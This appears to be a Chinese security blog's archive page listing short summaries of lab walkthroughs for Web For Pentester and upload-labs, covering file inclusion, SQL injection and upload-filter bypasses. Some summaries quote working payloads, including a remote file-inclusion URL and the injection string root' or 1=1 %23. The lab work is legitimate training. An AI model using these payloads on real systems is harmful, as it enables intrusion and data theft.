04 2022 档案

摘要:File include(文件包含) Example 1 没有任何过滤 审计源码 没有对我们传参的page进行任何过滤,payload如下 http://172.16.1.104/fileincl/example1.php?page=http://172.16.1.102/info.txt 本机in 阅读全文
posted @ 2022-04-18 14:59 Junglezt 阅读(92) 评论(2) 推荐(1) 编辑
摘要:SQL injections Example 1 典型的SQL注入 name=root' or 1=1 %23 直接执行就可以导出所有用户 查看后端的源码 观察到,我们传入入的name中,传入就成为了'root',所以我们root' %23就是root' #可以闭合成功 这里由于后面也有一个',所以 阅读全文
posted @ 2022-04-16 15:49 Junglezt 阅读(109) 评论(0) 推荐(0) 编辑
摘要:Web For Pentester是集成了一些简单的Web常见漏洞的靶场,其中有常见的XSS 文件上传 SQL注入 文件包含等常见漏洞,类似于DVWA Web For Pentester搭建 Web For Pentester官方直接提供了一个ISO的镜像文件 下载地址:https://www.pe 阅读全文
posted @ 2022-04-15 11:29 Junglezt 阅读(969) 评论(0) 推荐(0) 编辑
摘要:Pass-18 条件竞争 审计源码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file 阅读全文
posted @ 2022-04-09 15:22 Junglezt 阅读(298) 评论(0) 推荐(0) 编辑
摘要:Pass-17 审计源码 $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name'] 阅读全文
posted @ 2022-04-09 11:00 Junglezt 阅读(584) 评论(0) 推荐(0) 编辑
摘要:Pass12 GET00%截断 审计源码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); // 定义一个允许上传文件的数组 $file_ext = s 阅读全文
posted @ 2022-04-08 15:04 Junglezt 阅读(270) 评论(0) 推荐(0) 编辑
摘要:Pass-5 .user.ini文件 根据我的观察,最新版的upload-labs第五关和旧版的不一样,这一关可以使用和Pass-10一样的方法通过,但是,其他所有的关卡都禁止了.ini文件的上传,就这一关没有禁止,老版的upload-labs没有这一关,由于网上我也没找到.ini文件如何利用,只能 阅读全文
posted @ 2022-04-07 15:28 Junglezt 阅读(334) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示